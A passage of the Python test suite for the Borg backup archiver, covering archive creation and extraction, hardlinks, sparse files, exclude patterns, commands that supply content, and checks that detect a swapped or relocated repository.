sock.bind(os.path.join(self.input_path, 'unix-socket'))
except PermissionError as err:
if err.errno == errno.EPERM:
pytest.skip('unix sockets disabled or not supported')
elif err.errno == errno.EACCES:
pytest.skip('permission denied to create unix sockets')
self.cmd('create', self.repository_location + '::test', 'input')
sock.close()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert not os.path.exists('input/unix-socket')
@pytest.mark.skipif(not are_symlinks_supported(), reason='symlinks not supported')
def test_symlink_extract(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.readlink('input/link1') == 'somewhere'
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
def test_atime(self):
def has_noatime(some_file):
atime_before = os.stat(some_file).st_atime_ns
try:
with open(os.open(some_file, flags_noatime)) as file:
file.read()
except PermissionError:
return False
else:
atime_after = os.stat(some_file).st_atime_ns
noatime_used = flags_noatime != flags_normal
return noatime_used and atime_before == atime_after
self.create_test_files()
atime, mtime = 123456780, 234567890
have_noatime = has_noatime('input/file1')
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--atime', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
if have_noatime:
assert sti.st_atime_ns == sto.st_atime_ns == atime * 1e9
else:
# it touched the input file's atime while backing it up
assert sto.st_atime_ns == atime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_birthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == int(sto.st_birthtime * 1e9) == birthtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
@pytest.mark.skipif(not is_utime_fully_supported(), reason='cannot properly setup and execute test without utime')
@pytest.mark.skipif(not is_birthtime_fully_supported(), reason='cannot properly setup and execute test without birthtime')
def test_nobirthtime(self):
self.create_test_files()
birthtime, mtime, atime = 946598400, 946684800, 946771200
os.utime('input/file1', (atime, birthtime))
os.utime('input/file1', (atime, mtime))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--nobirthtime', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
sti = os.stat('input/file1')
sto = os.stat('output/input/file1')
assert int(sti.st_birthtime * 1e9) == birthtime * 1e9
assert int(sto.st_birthtime * 1e9) == mtime * 1e9
assert sti.st_mtime_ns == sto.st_mtime_ns == mtime * 1e9
def _extract_repository_id(self, path):
with Repository(self.repository_path) as repository:
return repository.id
def _set_repository_id(self, path, id):
config = ConfigParser(interpolation=None)
config.read(os.path.join(path, 'config'))
config.set('repository', 'id', bin_to_hex(id))
with open(os.path.join(path, 'config'), 'w') as fd:
config.write(fd)
with Repository(self.repository_path) as repository:
return repository.id
def test_sparse_file(self):
def is_sparse(fn, total_size, hole_size):
st = os.stat(fn)
assert st.st_size == total_size
sparse = True
if sparse and hasattr(st, 'st_blocks') and st.st_blocks * 512 >= st.st_size:
sparse = False
if sparse and has_seek_hole:
with open(fn, 'rb') as fd:
# only check if the first hole is as expected, because the 2nd hole check
# is problematic on xfs due to its "dynamic speculative EOF preallocation
try:
if fd.seek(0, os.SEEK_HOLE) != 0:
sparse = False
if fd.seek(0, os.SEEK_DATA) != hole_size:
sparse = False
except OSError:
# OS/FS does not really support SEEK_HOLE/SEEK_DATA
sparse = False
return sparse
filename = os.path.join(self.input_path, 'sparse')
content = b'foobar'
hole_size = 5 * (1 << CHUNK_MAX_EXP) # 5 full chunker buffers
total_size = hole_size + len(content) + hole_size
with open(filename, 'wb') as fd:
# create a file that has a hole at the beginning and end (if the
# OS and filesystem supports sparse files)
fd.seek(hole_size, 1)
fd.write(content)
fd.seek(hole_size, 1)
pos = fd.tell()
fd.truncate(pos)
# we first check if we could create a sparse input file:
sparse_support = is_sparse(filename, total_size, hole_size)
if sparse_support:
# we could create a sparse input file, so creating a backup of it and
# extracting it again (as sparse) should also work:
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir(self.output_path):
self.cmd('extract', '--sparse', self.repository_location + '::test')
self.assert_dirs_equal('input', 'output/input')
filename = os.path.join(self.output_path, 'input', 'sparse')
with open(filename, 'rb') as fd:
# check if file contents are as expected
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_equal(fd.read(len(content)), content)
self.assert_equal(fd.read(hole_size), b'\0' * hole_size)
self.assert_true(is_sparse(filename, total_size, hole_size))
def test_unusual_filenames(self):
filenames = ['normal', 'with some blanks', '(with_parens)', ]
for filename in filenames:
filename = os.path.join(self.input_path, filename)
with open(filename, 'wb'):
pass
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
for filename in filenames:
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', os.path.join('input', filename))
assert os.path.exists(os.path.join('output', 'input', filename))
def test_repository_swap_detection(self):
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_no_cache(self):
self.create_test_files()
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = self._extract_repository_id(self.repository_path)
self.cmd('create', self.repository_location + '::test', 'input')
shutil.rmtree(self.repository_path)
self.cmd('init', '--encryption=none', self.repository_location)
self._set_repository_id(self.repository_path, repository_id)
self.assert_equal(repository_id, self._extract_repository_id(self.repository_path))
self.cmd('delete', '--cache-only', self.repository_location)
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.EncryptionMethodMismatch):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_swap_detection2_no_cache(self):
self.create_test_files()
self.cmd('init', '--encryption=none', self.repository_location + '_unencrypted')
os.environ['BORG_PASSPHRASE'] = 'passphrase'
self.cmd('init', '--encryption=repokey', self.repository_location + '_encrypted')
self.cmd('create', self.repository_location + '_encrypted::test', 'input')
self.cmd('delete', '--cache-only', self.repository_location + '_unencrypted')
self.cmd('delete', '--cache-only', self.repository_location + '_encrypted')
shutil.rmtree(self.repository_path + '_encrypted')
os.rename(self.repository_path + '_unencrypted', self.repository_path + '_encrypted')
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.RepositoryAccessAborted):
self.cmd('create', self.repository_location + '_encrypted::test.2', 'input')
def test_repository_swap_detection_repokey_blank_passphrase(self):
# Check that a repokey repo with a blank passphrase is considered like a plaintext repo.
self.create_test_files()
# User initializes her repository with her passphrase
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
# Attacker replaces it with her own repository, which is encrypted but has no passphrase set
shutil.rmtree(self.repository_path)
with environment_variable(BORG_PASSPHRASE=''):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Delete cache & security database, AKA switch to user perspective
self.cmd('delete', '--cache-only', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
shutil.rmtree(get_security_dir(repository_id))
with environment_variable(BORG_PASSPHRASE=None):
# This is the part were the user would be tricked, e.g. she assumes that BORG_PASSPHRASE
# is set, while it isn't. Previously this raised no warning,
# since the repository is, technically, encrypted.
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test.2', 'input', exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('create', self.repository_location + '::test.2', 'input')
def test_repository_move(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
os.rename(self.repository_path, self.repository_path + '_new')
with environment_variable(BORG_RELOCATED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location + '_new')
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location')) as fd:
location = fd.read()
assert location == Location(self.repository_location + '_new').canonical_path()
# Needs no confirmation anymore
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location + '_new')
shutil.rmtree(security_dir)
self.cmd('info', self.repository_location + '_new')
for file in ('location', 'key-type', 'manifest-timestamp'):
assert os.path.exists(os.path.join(security_dir, file))
def test_security_dir_compat(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
with open(os.path.join(security_dir, 'location'), 'w') as fd:
fd.write('something outdated')
# This is fine, because the cache still has the correct information. security_dir and cache can disagree
# if older versions are used to confirm a renamed repository.
self.cmd('info', self.repository_location)
def test_unknown_unencrypted(self):
self.cmd('init', '--encryption=none', self.repository_location)
repository_id = bin_to_hex(self._extract_repository_id(self.repository_path))
security_dir = get_security_dir(repository_id)
# Ok: repository is known
self.cmd('info', self.repository_location)
# Ok: repository is still known (through security_dir)
shutil.rmtree(self.cache_path)
self.cmd('info', self.repository_location)
# Needs confirmation: cache and security dir both gone (eg. another host or rm -rf ~)
shutil.rmtree(self.cache_path)
shutil.rmtree(security_dir)
if self.FORK_DEFAULT:
self.cmd('info', self.repository_location, exit_code=EXIT_ERROR)
else:
with pytest.raises(Cache.CacheInitAbortedError):
self.cmd('info', self.repository_location)
with environment_variable(BORG_UNKNOWN_UNENCRYPTED_REPO_ACCESS_IS_OK='yes'):
self.cmd('info', self.repository_location)
def test_strip_components(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('dir/file')
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '3')
self.assert_true(not os.path.exists('file'))
with self.assert_creates_file('file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
with self.assert_creates_file('dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '1')
with self.assert_creates_file('input/dir/file'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '0')
def _extract_hardlinks_setup(self):
os.mkdir(os.path.join(self.input_path, 'dir1'))
os.mkdir(os.path.join(self.input_path, 'dir1/subdir'))
self.create_regular_file('source', contents=b'123456')
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'abba'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/hardlink'))
os.link(os.path.join(self.input_path, 'source'),
os.path.join(self.input_path, 'dir1/subdir/hardlink'))
self.create_regular_file('dir1/source2')
os.link(os.path.join(self.input_path, 'dir1/source2'),
os.path.join(self.input_path, 'dir1/aaaa'))
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
@requires_hardlinks
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_fuse_mount_hardlinks(self):
self._extract_hardlinks_setup()
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
# we need to get rid of permissions checking because fakeroot causes issues with it.
# On all platforms, borg defaults to "default_permissions" and we need to get rid of it via "ignore_permissions".
# On macOS (darwin), we additionally need "defer_permissions" to switch off the checks in osxfuse.
if sys.platform == 'darwin':
ignore_perms = ['-o', 'ignore_permissions,defer_permissions']
else:
ignore_perms = ['-o', 'ignore_permissions']
with self.fuse_mount(self.repository_location + '::test', mountpoint, '--strip-components=2', *ignore_perms), \
changedir(mountpoint):
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, 'input/dir1', *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
with self.fuse_mount(self.repository_location + '::test', mountpoint, *ignore_perms), \
changedir(mountpoint):
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks1(self):
self._extract_hardlinks_setup()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
assert os.stat('input/source').st_nlink == 4
assert os.stat('input/abba').st_nlink == 4
assert os.stat('input/dir1/hardlink').st_nlink == 4
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 4
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
@requires_hardlinks
def test_extract_hardlinks2(self):
self._extract_hardlinks_setup()
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', '--strip-components', '2')
assert os.stat('hardlink').st_nlink == 2
assert os.stat('subdir/hardlink').st_nlink == 2
assert open('subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('aaaa').st_nlink == 2
assert os.stat('source2').st_nlink == 2
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/dir1')
assert os.stat('input/dir1/hardlink').st_nlink == 2
assert os.stat('input/dir1/subdir/hardlink').st_nlink == 2
assert open('input/dir1/subdir/hardlink', 'rb').read() == b'123456'
assert os.stat('input/dir1/aaaa').st_nlink == 2
assert os.stat('input/dir1/source2').st_nlink == 2
@requires_hardlinks
def test_extract_hardlinks_twice(self):
# setup for #5603
path_a = os.path.join(self.input_path, 'a')
path_b = os.path.join(self.input_path, 'b')
os.mkdir(path_a)
os.mkdir(path_b)
hl_a = os.path.join(path_a, 'hardlink')
hl_b = os.path.join(path_b, 'hardlink')
self.create_regular_file(hl_a, contents=b'123456')
os.link(hl_a, hl_b)
self.cmd('init', '--encryption=none', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input') # give input twice!
# now test extraction
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
# if issue #5603 happens, extraction gives rc == 1 (triggering AssertionError) and warnings like:
# input/a/hardlink: link: [Errno 2] No such file or directory: 'input/a/hardlink' -> 'input/a/hardlink'
# input/b/hardlink: link: [Errno 2] No such file or directory: 'input/a/hardlink' -> 'input/b/hardlink'
# otherwise, when fixed, the hardlinks should be there and have a link count of 2
assert os.stat('input/a/hardlink').st_nlink == 2
assert os.stat('input/b/hardlink').st_nlink == 2
def test_extract_include_exclude(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.cmd('create', '--exclude=input/file4', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test', 'input/file1', )
self.assert_equal(sorted(os.listdir('output/input')), ['file1'])
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file3'])
def test_extract_include_exclude_regex(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
# Create with regular expression exclusion for file4
self.cmd('create', '--exclude=re:input/file4$', self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Extract with regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude=re:file3+', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Combine --exclude with fnmatch and regular expression
with changedir('output'):
self.cmd('extract', '--exclude=input/file2', '--exclude=re:file[01]', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3', 'file333'])
shutil.rmtree('output/input')
# Combine --exclude-from and regular expression exclusion
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, '--exclude=re:file1',
'--exclude=re:file(\\d)\\1\\1$', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_include_exclude_regex_from_file(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file3', size=1024 * 80)
self.create_regular_file('file4', size=1024 * 80)
self.create_regular_file('file333', size=1024 * 80)
self.create_regular_file('aa:something', size=1024 * 80)
# Create while excluding using mixed pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:input/file4$\n')
fd.write(b'fm:*aa:*thing\n')
self.cmd('create', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test', 'input')
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2', 'file3', 'file333'])
shutil.rmtree('output/input')
# Exclude using regular expression
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file3+\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file1', 'file2'])
shutil.rmtree('output/input')
# Mixed exclude pattern styles
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b're:file(\\d)\\1\\1$\n')
fd.write(b'fm:nothingwillmatchthis\n')
fd.write(b'*/file1\n')
fd.write(b're:file2$\n')
with changedir('output'):
self.cmd('extract', '--exclude-from=' + self.exclude_file_path, self.repository_location + '::test')
self.assert_equal(sorted(os.listdir('output/input')), ['file3'])
def test_extract_with_pattern(self):
self.cmd("init", '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("file2", size=1024 * 80)
self.create_regular_file("file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
self.create_regular_file("file333", size=1024 * 80)
self.cmd("create", self.repository_location + "::test", "input")
# Extract everything with regular expression
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "re:.*")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file3", "file333", "file4"])
shutil.rmtree("output/input")
# Extract with pattern while also excluding files
with changedir("output"):
self.cmd("extract", "--exclude=re:file[34]$", self.repository_location + "::test", r"re:file\d$")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2"])
shutil.rmtree("output/input")
# Combine --exclude with pattern for extraction
with changedir("output"):
self.cmd("extract", "--exclude=input/file1", self.repository_location + "::test", "re:file[12]$")
self.assert_equal(sorted(os.listdir("output/input")), ["file2"])
shutil.rmtree("output/input")
# Multiple pattern
with changedir("output"):
self.cmd("extract", self.repository_location + "::test", "fm:input/file1", "fm:*file33*", "input/file2")
self.assert_equal(sorted(os.listdir("output/input")), ["file1", "file2", "file333"])
def test_extract_list_output(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--info', self.repository_location + '::test')
self.assert_not_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', self.repository_location + '::test')
self.assert_in("input/file", output)
shutil.rmtree('output/input')
with changedir('output'):
output = self.cmd('extract', '--list', '--info', self.repository_location + '::test')
self.assert_in("input/file", output)
def test_extract_progress(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file', size=1024 * 80)
self.cmd('create', self.repository_location + '::test', 'input')
with changedir('output'):
output = self.cmd('extract', self.repository_location + '::test', '--progress')
assert 'Extracting:' in output
def _create_test_caches(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('cache1/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
self.create_regular_file('cache2/%s' % CACHE_TAG_NAME,
contents=b'invalid signature')
os.mkdir('input/cache3')
if are_hardlinks_supported():
os.link('input/cache1/%s' % CACHE_TAG_NAME, 'input/cache3/%s' % CACHE_TAG_NAME)
else:
self.create_regular_file('cache3/%s' % CACHE_TAG_NAME,
contents=CACHE_TAG_CONTENTS + b' extra stuff')
def test_create_stdin(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
input_data = b'\x00foo\n\nbar\n \n'
self.cmd('create', self.repository_location + '::test', '-', input=input_data)
item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
assert item['uid'] == 0
assert item['gid'] == 0
assert item['size'] == len(input_data)
assert item['path'] == 'stdin'
extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test', binary_output=True)
assert extracted_data == input_data
def test_create_content_from_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
input_data = 'some test content'
name = 'a/b/c'
self.cmd('create', '--stdin-name', name, '--content-from-command',
self.repository_location + '::test', '--', 'echo', input_data)
item = json.loads(self.cmd('list', '--json-lines', self.repository_location + '::test'))
assert item['uid'] == 0
assert item['gid'] == 0
assert item['size'] == len(input_data) + 1 # `echo` adds newline
assert item['path'] == name
extracted_data = self.cmd('extract', '--stdout', self.repository_location + '::test')
assert extracted_data == input_data + '\n'
def test_create_content_from_command_with_failed_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--content-from-command', self.repository_location + '::test',
'--', 'sh', '-c', 'exit 73;', exit_code=2)
assert output.endswith("Command 'sh' exited with status 73\n")
archive_list = json.loads(self.cmd('list', '--json', self.repository_location))
assert archive_list['archives'] == []
def test_create_content_from_command_missing_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--content-from-command', self.repository_location + '::test', exit_code=2)
assert output.endswith('No command given.\n')
def test_create_paths_from_stdin(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("dir1/file2", size=1024 * 80)
self.create_regular_file("dir1/file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
input_data = b'input/file1\0input/dir1\0input/file4'
self.cmd('create', '--paths-from-stdin', '--paths-delimiter', '\\0',
self.repository_location + '::test', input=input_data)
archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
assert paths == ['input/file1', 'input/dir1', 'input/file4']
def test_create_paths_from_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file("file1", size=1024 * 80)
self.create_regular_file("file2", size=1024 * 80)
self.create_regular_file("file3", size=1024 * 80)
self.create_regular_file("file4", size=1024 * 80)
input_data = 'input/file1\ninput/file2\ninput/file3'
self.cmd('create', '--paths-from-command',
self.repository_location + '::test', '--', 'echo', input_data)
archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
assert paths == ['input/file1', 'input/file2', 'input/file3']
def test_create_paths_from_command_with_failed_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--paths-from-command', self.repository_location + '::test',
'--', 'sh', '-c', 'exit 73;', exit_code=2)
assert output.endswith("Command 'sh' exited with status 73\n")
archive_list = json.loads(self.cmd('list', '--json', self.repository_location))
assert archive_list['archives'] == []
def test_create_paths_from_command_missing_command(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--paths-from-command', self.repository_location + '::test', exit_code=2)
assert output.endswith('No command given.\n')
def test_create_without_root(self):
"""test create without a root"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', exit_code=2)
def test_create_pattern_root(self):
"""test create with only a root pattern"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
output = self.cmd('create', '-v', '--list', '--pattern=R input', self.repository_location + '::test')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
def test_create_pattern(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=+input/file_important', '--pattern=-input/file*',
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
def test_create_pattern_file(self):
"""test file patterns during create"""
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('file2', size=1024 * 80)
self.create_regular_file('otherfile', size=1024 * 80)
self.create_regular_file('file_important', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--pattern=-input/otherfile', '--patterns-from=' + self.patterns_file_path,
self.repository_location + '::test', 'input')
self.assert_in("A input/file_important", output)
self.assert_in('x input/file1', output)
self.assert_in('x input/file2', output)
self.assert_in('x input/otherfile', output)
def test_create_pattern_exclude_folder_but_recurse(self):
"""test when patterns exclude a parent folder, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_in('x input/x/a/foo_a', output)
self.assert_in("A input/x/b/foo_b", output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_exclude_folder_no_recurse(self):
"""test when patterns exclude a parent folder and, but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/b\n! input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
self.create_regular_file('y/foo_y', size=1024 * 80)
output = self.cmd('create', '-v', '--list',
'--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', 'input')
self.assert_not_in('input/x/a/foo_a', output)
self.assert_not_in('input/x/a', output)
self.assert_in('A input/y/foo_y', output)
def test_create_pattern_intermediate_folders_first(self):
"""test that intermediate folders appear first when patterns exclude a parent folder but include a child"""
self.patterns_file_path2 = os.path.join(self.tmpdir, 'patterns2')
with open(self.patterns_file_path2, 'wb') as fd:
fd.write(b'+ input/x/a\n+ input/x/b\n- input/x*\n')
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_regular_file('x/a/foo_a', size=1024 * 80)
self.create_regular_file('x/b/foo_b', size=1024 * 80)
with changedir('input'):
self.cmd('create', '--patterns-from=' + self.patterns_file_path2,
self.repository_location + '::test', '.')
# list the archive and verify that the "intermediate" folders appear before
# their contents
out = self.cmd('list', '--format', '{type} {path}{NL}', self.repository_location + '::test')
out_list = out.splitlines()
self.assert_in('d x/a', out_list)
self.assert_in('d x/b', out_list)
assert out_list.index('d x/a') < out_list.index('- x/a/foo_a')
assert out_list.index('d x/b') < out_list.index('- x/b/foo_b')
